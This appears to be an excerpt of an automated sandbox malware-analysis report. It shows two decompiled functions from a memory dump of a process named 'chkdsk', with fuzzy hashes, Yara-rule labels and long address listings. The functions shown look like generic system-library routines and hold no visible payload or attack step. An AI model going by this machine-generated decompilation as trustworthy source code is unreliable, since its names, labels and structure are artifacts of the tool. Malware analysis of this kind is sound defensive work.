                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7569d856c9521e6377d4ec93aabddd91f097ce3d3f834cdbf7cf625fd789df05
                                                      • Instruction ID: 8e5375ea37725f322119dbb4cfa601682e05b476615ac5bb2560190f18308468
                                                      • Opcode Fuzzy Hash: 7569d856c9521e6377d4ec93aabddd91f097ce3d3f834cdbf7cf625fd789df05
                                                      • Instruction Fuzzy Hash: D7F1F332608301EFDB25CF68D8587AA77E1BB85364F05899DE9D68B381D734F841CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D9849B Relevance: .3, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E04D9849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x4e5f9c0);
				E04DDD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4e77b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E04D9CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04DA2280( *[fs:0x30], 0x4e78550);
						_t139 =  *0x4e77b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E04DBF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E04D9FFB0(_t193, _t235, 0x4e78550);
								L5:
								return E04DDD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04D81C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4e77b9c; // 0x0
							_t235 = L04DA4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4e77b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E04DBA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E04D9FFB0(_t193, _t235, 0x4e78550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L04DA77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L04DA77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4e77b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4e77b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E04DC37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4e77b9c; // 0x0
									_t214 = L04DA4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E04DC37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4e77b10 =  *0x4e77b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4e77b04 =  *0x4e77b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L04DA77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L04DA77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4e77b08 =  *0x4e77b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E04DC57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E04DCF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L04DA77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E04DBA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L04DA77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E04DC96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                      0x04d9849b
                                                      0x04d9849b
                                                      0x04d9849b
                                                      0x04d9849b
                                                      0x04d9849d
                                                      0x04d984a2
                                                      0x04d984a7
                                                      0x04d984b1
                                                      0x04d984d8
                                                      0x00000000
                                                      0x04d984b3
                                                      0x04d984c4
                                                      0x04d984c9
                                                      0x04d984cd
                                                      0x04d984cf
                                                      0x04d984cf
                                                      0x04d984d6
                                                      0x04d984e6
                                                      0x04d984e9
                                                      0x04d984ec
                                                      0x04d984ef
                                                      0x04d984f2
                                                      0x04d984f4
                                                      0x04d984fc
                                                      0x04d98501
                                                      0x04d98506
                                                      0x04d98509
                                                      0x04d986e0
                                                      0x04d986e5
                                                      0x04d986e8
                                                      0x04d986ed
                                                      0x04d986f0
                                                      0x04d986f2
                                                      0x04de9afd
                                                      0x04de9b02
                                                      0x04d984da
                                                      0x04d984df
                                                      0x04d984df
                                                      0x04d986fa
                                                      0x04d986fd
                                                      0x04d986fe
                                                      0x04d98701
                                                      0x04d98706
                                                      0x04d98709
                                                      0x04d9870b
                                                      0x00000000
                                                      0x00000000
                                                      0x04d98711
                                                      0x04d98725
                                                      0x04d98727
                                                      0x04d9872a
                                                      0x04d9872c
                                                      0x04de9af0
                                                      0x04de9af5
                                                      0x04d98732
                                                      0x04d98732
                                                      0x04d98732
                                                      0x04d98735
                                                      0x04d98737
                                                      0x04d98515
                                                      0x04d98515
                                                      0x04d98518
                                                      0x04d9851d
                                                      0x04d98523
                                                      0x04d98527
                                                      0x04d9852b
                                                      0x04d98537
                                                      0x04d98539
                                                      0x04d9853c
                                                      0x04d9853e
                                                      0x04d9868c
                                                      0x04d98691
                                                      0x04d98699
                                                      0x04d9869b
                                                      0x04d98744
                                                      0x04d98748
                                                      0x04d986a1
                                                      0x04d986a1
                                                      0x04d986a1
                                                      0x04d986a4
                                                      0x04d986a8
                                                      0x04de9bdf
                                                      0x04de9bdf
                                                      0x04d986ae
                                                      0x04d986b0
                                                      0x00000000
                                                      0x04d986b6
                                                      0x00000000
                                                      0x04de9be9
                                                      0x04d986b0
                                                      0x04d98544
                                                      0x04d9854a
                                                      0x04d9854d
                                                      0x04d98551
                                                      0x04d9876e
                                                      0x04d98778
                                                      0x04d9877b
                                                      0x04d98780
                                                      0x04d98557
                                                      0x04d98557
                                                      0x04d9855d
                                                      0x04d9855d
                                                      0x04d9856b
                                                      0x04d9856e
                                                      0x04d98570
                                                      0x04d98573
                                                      0x04d98576
                                                      0x04d98576
                                                      0x04d98579
                                                      0x04d9857b
                                                      0x00000000
                                                      0x00000000
                                                      0x04d98581
                                                      0x04d985a0
                                                      0x04d985a2
                                                      0x04d985a5
                                                      0x04d985a7
                                                      0x04de9b1b
                                                      0x04de9b1b
                                                      0x04d9862e
                                                      0x04d9862e
                                                      0x04d98631
                                                      0x04d98631
                                                      0x04d98634
                                                      0x04d98636
                                                      0x04d98669
                                                      0x04d98669
                                                      0x04d9866b
                                                      0x04de9bbf
                                                      0x04de9bc4
                                                      0x04de9bc8
                                                      0x04de9bce
                                                      0x04de9bce
                                                      0x04d98671
                                                      0x04d98671
                                                      0x04d98674
                                                      0x04d98676
                                                      0x04de9bae
                                                      0x04de9bae
                                                      0x04d98676
                                                      0x04d9867c
                                                      0x04d9867e
                                                      0x04d98688
                                                      0x04d98688
                                                      0x00000000
                                                      0x04d9867e
                                                      0x04d98638
                                                      0x04d98638
                                                      0x04d9863b
                                                      0x04d9863e
                                                      0x04d9863f
                                                      0x04d98642
                                                      0x04d98645
                                                      0x04d98648
                                                      0x04d9864d
                                                      0x04de9b69
                                                      0x04de9b6e
                                                      0x04de9b7b
                                                      0x04de9b81
                                                      0x04de9b85
                                                      0x04de9b89
                                                      0x04de9ba7
                                                      0x04de9b8b
                                                      0x04de9b91
                                                      0x04de9b9a
                                                      0x04de9b9f
                                                      0x04de9b9f
                                                      0x04d98788
                                                      0x04d9878d
                                                      0x04d98763
                                                      0x04d98763
                                                      0x04d98766
                                                      0x00000000
                                                      0x04d98766
                                                      0x04de9b70
                                                      0x00000000
                                                      0x04de9b70
                                                      0x04d98656
                                                      0x04d9865a
                                                      0x04d9865c
                                                      0x04d98752
                                                      0x04d98756
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9875e
                                                      0x00000000
                                                      0x04d9875e
                                                      0x04d98662
                                                      0x04d98662
                                                      0x04d98662
                                                      0x04d98666
                                                      0x00000000
                                                      0x04d98666
                                                      0x04d985b7
                                                      0x04d985b9
                                                      0x04d985bc
                                                      0x04d985bf
                                                      0x04d985cc
                                                      0x04d985d1
                                                      0x04d985d4
                                                      0x04d985db
                                                      0x04d985de
                                                      0x04d985e0
                                                      0x04de9b5f
                                                      0x00000000
                                                      0x04de9b5f
                                                      0x04d985e6
                                                      0x04d985ea
                                                      0x04d986c3
                                                      0x04d986c5
                                                      0x04d986c8
                                                      0x04d986ca
                                                      0x04de9b16
                                                      0x00000000
                                                      0x04de9b16
                                                      0x04d986d6
                                                      0x04d985f6
                                                      0x04d985f6
                                                      0x04d985f9
                                                      0x04d98602
                                                      0x04d98606
                                                      0x04d9860a
                                                      0x04d9860b
                                                      0x04d9860e
                                                      0x04d98611
                                                      0x00000000
                                                      0x04d98611
                                                      0x04d985f3
                                                      0x00000000
                                                      0x04d985f3
                                                      0x04d98619
                                                      0x04d9861e
                                                      0x04d9861e
                                                      0x04d98621
                                                      0x04d98622
                                                      0x04d98623
                                                      0x04d98625
                                                      0x04d9862c
                                                      0x00000000
                                                      0x04d9873d
                                                      0x00000000
                                                      0x04d9873d
                                                      0x04d98737
                                                      0x04d9850f
                                                      0x04d98512
                                                      0x00000000
                                                      0x04d98512
                                                      0x00000000
                                                      0x04d984d6

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70fb059bc91e948de691826652e4bdd18f6a12cff4f86c1cc8617bb3ba345105
                                                      • Instruction ID: 74c8e2c57a79674601afcb2d48115083083ad1cb3bb3f79b13ffb4dfec30a747
                                                      • Opcode Fuzzy Hash: 70fb059bc91e948de691826652e4bdd18f6a12cff4f86c1cc8617bb3ba345105
                                                      • Instruction Fuzzy Hash: 8DB125B0F102099FDF25EFA9C984AADBBB6FF49704F10412AE405AB245E770BC45DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB513A Relevance: .3, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E04DB513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4e7d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E04DCD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04DA2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04DA4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E04DCF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E04D9FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4e7b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E04DCB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                      0x04db5142
                                                      0x04db514c
                                                      0x04db5150
                                                      0x04db5157
                                                      0x04db5159
                                                      0x04db515e
                                                      0x04db5165
                                                      0x04db5169
                                                      0x04db516c
                                                      0x04db5172
                                                      0x04db5176
                                                      0x04db517a
                                                      0x04db517a
                                                      0x04db517a
                                                      0x04db517f
                                                      0x04df6d8b
                                                      0x04df6d8e
                                                      0x04df6d91
                                                      0x04df6d95
                                                      0x04df6d98
                                                      0x04df6d9c
                                                      0x04df6da0
                                                      0x04df6da3
                                                      0x04df6da7
                                                      0x04df6e26
                                                      0x04df6e26
                                                      0x04df6e2a
                                                      0x04db51f9
                                                      0x04db51f9
                                                      0x04db51fe
                                                      0x04df6e33
                                                      0x04df6e33
                                                      0x04df6e39
                                                      0x04df6e3d
                                                      0x04df6e46
                                                      0x04df6e50
                                                      0x00000000
                                                      0x00000000
                                                      0x04df6e52
                                                      0x04df6e53
                                                      0x04df6e56
                                                      0x04df6e5d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04df6e5f
                                                      0x04df6e67
                                                      0x04df6e77
                                                      0x04df6e7f
                                                      0x04df6e80
                                                      0x04df6e88
                                                      0x04df6e90
                                                      0x04df6e9f
                                                      0x04df6ea5
                                                      0x04df6ea9
                                                      0x04df6eb1
                                                      0x04df6ebf
                                                      0x00000000
                                                      0x00000000
                                                      0x04df6ecf
                                                      0x04df6ed3
                                                      0x00000000
                                                      0x00000000
                                                      0x04df6edb
                                                      0x04df6ede
                                                      0x04df6ee1
                                                      0x04df6ee8
                                                      0x04df6eeb
                                                      0x04df6eed
                                                      0x04df6ef0
                                                      0x04df6ef4
                                                      0x04df6ef8
                                                      0x04df6efc
                                                      0x00000000
                                                      0x00000000
                                                      0x04df6f0d
                                                      0x04df6f11
                                                      0x04df6f32
                                                      0x04df6f37
                                                      0x04df6f3b
                                                      0x04df6f3e
                                                      0x04df6f41
                                                      0x04df6f46
                                                      0x00000000
                                                      0x00000000
                                                      0x04df6f4c
                                                      0x04df6f50
                                                      0x04df6f50
                                                      0x04df6f54
                                                      0x04df6f62
                                                      0x04df6f65
                                                      0x04df6f6d
                                                      0x04df6f7b
                                                      0x04df6f7b
                                                      0x04df6f93
                                                      0x04df6f98
                                                      0x04df6fa0
                                                      0x04df6fa6
                                                      0x04df6fb3
                                                      0x04df6fb6
                                                      0x04df6fbf
                                                      0x04df6fc1
                                                      0x04df6fd5
                                                      0x04df6fda
                                                      0x04df6fda
                                                      0x04df6fdd
                                                      0x04df6fe2
                                                      0x04df6fe7
                                                      0x04df6feb
                                                      0x04df6fef
                                                      0x04df6ff3
                                                      0x04db520c
                                                      0x04db520c
                                                      0x04db520f
                                                      0x04db5215
                                                      0x04db5234
                                                      0x04db523a
                                                      0x04db523a
                                                      0x04db5244
                                                      0x04db5245
                                                      0x04db5246
                                                      0x04db5251
                                                      0x04db5251
                                                      0x04df6f13
                                                      0x04df6f17
                                                      0x04df6f17
                                                      0x04df6f18
                                                      0x04df6f1b
                                                      0x04df6f1f
                                                      0x04df6f23
                                                      0x00000000
                                                      0x04df6f28
                                                      0x04db5204
                                                      0x04db5204
                                                      0x04db5208
                                                      0x00000000
                                                      0x04db5208
                                                      0x04db5185
                                                      0x04db5188
                                                      0x04db518a
                                                      0x04db518e
                                                      0x04db5195
                                                      0x04df6db1
                                                      0x04df6db5
                                                      0x04df6db9
                                                      0x04db519b
                                                      0x04db519b
                                                      0x04db519e
                                                      0x04db51a7
                                                      0x04db51a9
                                                      0x04db51a9
                                                      0x04db51b5
                                                      0x04db51b8
                                                      0x04db51bb
                                                      0x04db51be
                                                      0x04db51c1
                                                      0x04db51c5
                                                      0x04db51c9
                                                      0x04db51cd
                                                      0x04db51cd
                                                      0x04db51d8
                                                      0x04db51dc
                                                      0x04db51e0
                                                      0x04df6dcc
                                                      0x04df6dd0
                                                      0x04df6dd5
                                                      0x04df6ddd
                                                      0x04df6de1
                                                      0x04df6de1
                                                      0x04df6de5
                                                      0x04df6deb
                                                      0x04df6df1
                                                      0x04df6df7
                                                      0x04df6dfd
                                                      0x04df6e01
                                                      0x04df6e05
                                                      0x04df6e09
                                                      0x04df6e0d
                                                      0x04df6e11
                                                      0x04df6e11
                                                      0x04db51eb
                                                      0x04df6e1a
                                                      0x04df6e1f
                                                      0x04df6e21
                                                      0x04df6e23
                                                      0x00000000
                                                      0x04db51f1
                                                      0x04db51f1
                                                      0x00000000
                                                      0x04db51f1

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b8c7be0c3a1bca370bd042b61bb71da0f95dbb9d1b6c6a630bf1de8fafe8f698
                                                      • Instruction ID: 24afcaf6ca93f039ef2ebc32b3602418576a639bec3e33aaae6496912de1c003
                                                      • Opcode Fuzzy Hash: b8c7be0c3a1bca370bd042b61bb71da0f95dbb9d1b6c6a630bf1de8fafe8f698
                                                      • Instruction Fuzzy Hash: 78C115756093809FD354CF28C980A5AFBE1BF88308F144A6EF9998B352D771E945CB52
                                                      Uniqueness

